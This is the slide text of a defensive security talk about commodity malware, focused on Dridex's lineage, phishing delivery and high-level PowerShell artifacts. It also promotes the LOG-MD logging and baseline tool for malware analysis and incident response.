1. Commodity malware means YOU!
And everybody in this room, let’s
look at one called Dridex
Michael Gough – Founder
MalwareArchaeology.com
MalwareArchaeology.com
2. Who am I
• Blue Team Defender Ninja, Malware Archaeologist, Logoholic
• I love “properly” configured logs – they tell us Who, What, Where,
When and hopefully How
Creator of
“Windows Logging Cheat Sheet”
“Windows PowerShell Logging Cheat Sheet”
“Windows Splunk Logging Cheat Sheet”
“Malware Management Framework”
• Co-Creator of “Log-MD” – Log Malicious Discovery Tool
– With @Boettcherpwned – Brakeing Down Security PodCast
• @HackerHurricane also my Blog
MalwareArchaeology.com
3. Goal
• Interaction – Don’t be a Ding Dong, ask a
question… you WILL be rewarded for positive
synergy!
• Learn how us Ninja’s do it so you can too
• We have a NEW Tool for YOU!!!
MalwareArchaeology.com
9. Top 8 threats
• These are what we see most
• What all of YOU see most
• The 20% of what AV focuses on
• We can learn a lot from this
MalwareArchaeology.com
10. Dridex movin on up
MalwareArchaeology.com
Mandiant M-Trends2016 Report
11. More of the same
According to CheckPoint’s ThreatCloud in 2015…
• 3000 different malware ‘families’
• 80% have been active for years, some for 8
years
• Top 100 which accounted for 90% of all
attacks in 2015, only 3 were new and were
outside the Top 40
• More proof Malware Management works
MalwareArchaeology.com
13. Sophos Says…
• 70% of malware is unique to 1 company (APT)
• 80% of malware is unique to 10 or less (APT)
• That means…
• 20% of malware is what the AV industry focuses
on, but it is what most of you and everyone in
this room sees and gets by:
– Attachments in email
– URL in email
– Surfing the web
• Ads
• WordPress, Drupal, Joomla…
MalwareArchaeology.com
14. Types of Malware
I say there are basically two types of malware:
• Commodity malware – The 20% the AV
industry focuses on
• Advanced malware – The 80% that the AV
industry does not focus on and “may” get
around to IF you force them by being a client
or if they have multiple customers that receive
it in a particular industry (e.g. retail PoS)
MalwareArchaeology.com
15. Commodity malware
• This is the stuff you and everyone in the room
gets and sees, your family, friends and clients
too
• Emails, URL’s surfing
• Most is Commodity malware
• Pwned Ad networks
• Some will be NEW
• Some will be APT
MalwareArchaeology.com
16. VirusTotal
• Commodity malware will be detected within a
few days
• APT… not so much
• I still have samples from 2012 that have ZERO
detection ;-(
• And I gave 12 AV companies a copy of it
• Shows how much they care about APT
MalwareArchaeology.com
17. Malware evolves
• So must we
• Darwin says so
• Evolve or die
• Well… Evolve or get breached anyways
• Which means an RGE !!!
– Resume Generating Event
MalwareArchaeology.com
18. Before Dridex
• Zeus – 2007
– SpyEye evolved from Zeus
– Bugat/Cridex evolved from Zeus
– Gameover Zeus taken down 2014
• Bugat & Cridex - 2012
• Dridex – Late 2014
– Generated 15,000 emails daily
• C2 Servers taken down Dec 2015
• Now we have Locky
MalwareArchaeology.com
25. Dridex
• We have probably all seen one of these
• Did I say Commodity Malware?
• Uses Word documents that are hard for email
gateways to detect
• Yes, users have to “Enable Macroses” but they
would NEVER do that…
MalwareArchaeology.com
26. Commodity Malware
Smarter than ever
• In 2015 I have witnessed things with
commodity malware usually reserved for APT
– Because they are evolving from APT
• More use of scripts to avoid AV detection
• More use of PowerShell backdoors!
• More stealthy persistence
MalwareArchaeology.com
32. Dridex Artifacts - .PS1
• Domains to phone home to
• Path - %temp%
MalwareArchaeology.com
33. Dridex Artifacts - .PS1
• 8 + .exe – Payload name
• 444.jpg – Stats file looks like >>>>
• User Agent to emulate a browser
• Download the files
• Assemble the names .vbs, .jpg, .bat, .PS1
• Sleep 15
• Execute the payload - cmd.exe %file%
• Remove the files
MalwareArchaeology.com
34. VM Aware… What do I say?
• Use Bare Bones to do analysis
MalwareArchaeology.com
35. Persistence
• New method towards the end of 2015
• Nothing in the Registry showing persistence while
system was running
• In memory only until system shutdown
• Then we caught the bugger, with good auditing of
course and
MalwareArchaeology.com
36. Malware Management
• Proof it works
• If you look at Zeus, Cridex and Dridex, you are
better prepared for Locky
• Learn from History
• Your defenses and detection MUST evolve too
• Read the malware analysis and breach reports
• Tweak your tools
• Focus on new kewl hooks and artifacts
MalwareArchaeology.com
37. How we harvested malware
• Yay Email!!!
• Since the primary delivery was Phishing, we were
able to grab copies of the Word documents
• Executed in the Lab
• Grabbed the artifacts
• Updated our Detection
• We knew if anyone fell for it and opened them
• We knew what to cleanup
MalwareArchaeology.com
38. How we harvested malware
• File Copy loop in Directories discovered
– @echo off
– cls
– md captured
– :Redo
– robocopy . Captured /E /B /r:0 /w:1 /np /xo /xd Captured
– Goto Redo
– :End
• Ninja Tip:
– Great to do in Labs for User space AppData
MalwareArchaeology.com
41. MalwareArchaeology.com
• Log and Malicious Discovery tool
• When you run the tool, it tells you what
auditing and settings to configure that it
requires. LOG-MD won’t harvest anything
until you configure the system!
• Once the system and/or GPO is configured
1. Clear the logs
2. Infect the system
3. Run Log-MD
4. Review “Report.csv” in Excel
42. Functions
MalwareArchaeology.com
• Audit Report of log settings compared to:
– The “Windows Logging Cheat Sheet”
– Center for Internet Security (CIS) Benchmarks
– Also USGCB and AU ACSC
• White lists to filter out the known good
– By IP Address
– By Process Command Line and/or Process Name
– By File and Registry locations (requires File and
Registry auditing to be set)
• Report.csv - data from logs specific to security
43. Purpose
MalwareArchaeology.com
• Malware Analysis Lab
• Investigate a suspect system
• Audit Advanced Audit Policy settings
• Help MOVE or PUSH security forward
• Give the IR folks what they need and the Feds too
• Take a full system (File and Reg) snapshot to compare to another
system and report the differences
• Discover tricky malware artifacts
• SPEED !
• Deploy with anything you want, SCCM, LanDesk, PSExec, PS, etc…
• Replace several tools we use today with one easy to use utility that
does much more
• To answer the question: Is this system infected or clean?
• And do it quickly !
44. Free Edition
MalwareArchaeology.com
• Harvest security relevant log data
• Whitelist log events by IP, Cmd Line, Process
and File / Registry audit locations
• Perform a full File Baseline of a system
• Compare a suspect system to a Baseline or Dir
• Perform a full Registry snapshot of a system
• Compare a suspect system to a Reg Baseline
• Look for Large Registry Keys for hidden
payloads
45. MalwareArchaeology.com
• Everything the Free Edition does and…
• More reports, breakdown of things to look for
• Specify the Output directory
• Harvest Sysmon logs
• Harvest WLS Logs
• Whitelist Hash compare results
• Whitelist Registry compare results
• Create a Master-Digest to exclude unique files
• Free updates for 1 year, expect a new release
every quarter
• Manual – How to use LOG-MD Professional
46. MalwareArchaeology.com
Future Versions – In the works!
• WhoIs lookups of IP Addresses called
• VirusTotal lookups of discovered files
• Find parent-less processes
• Assess all processes and create a Whitelist
• Assess all services and create a Whitelist
• VirusTotal lookups of unknown or new processes
and services
• PowerShell details
• Other API calls to security vendors
51. Use the power of Excel
MalwareArchaeology.com
• The reports are in .CSV format
• Excel has sorting and Filters
• Filters are AWESOME to thin out your results
• You might take filtered results and add them
to your whitelist once vetted
• Save to .XLS and format, color code and
produce your report
• For .TXT files use NotePad++
52. So what do we get?
MalwareArchaeology.com
• WHAT Processes executed
• WHERE it executed from
• IP’s to enter into Log Management to see
WHO else opened the malware
• Details needed to remediate infection
• Details to improve your Active Defense!
• I did this in…
15 Minutes!
53. Resources
MalwareArchaeology.com
• Websites
– Log-MD.com The tool
• The “Windows Logging Cheat Sheet”
– MalwareArchaeology.com
• Malware Analysis Report links too
– To start your Malware Management program
• This presentation is on SlideShare
– Search for MalwareArchaeology or LOG-MD
54. Testers for RC-1
MalwareArchaeology.com
• May 1st 2016 - launch date
• Looking for a few good testers…
– of LOG-MD Professional
• Test the manual and tool and provide feedback
• You WILL be rewarded for the effort ;-)
• You heard it here first !
• A gift from your local Austin Security
Professionals
55. Questions?
MalwareArchaeology.com
You can find us at:
• Log-MD.com
• @HackerHurricane
• @Boettcherpwned
• MalwareArchaeology.com
• HackerHurricane.com (blog)
• http://www.slideshare.net – LinkedIn now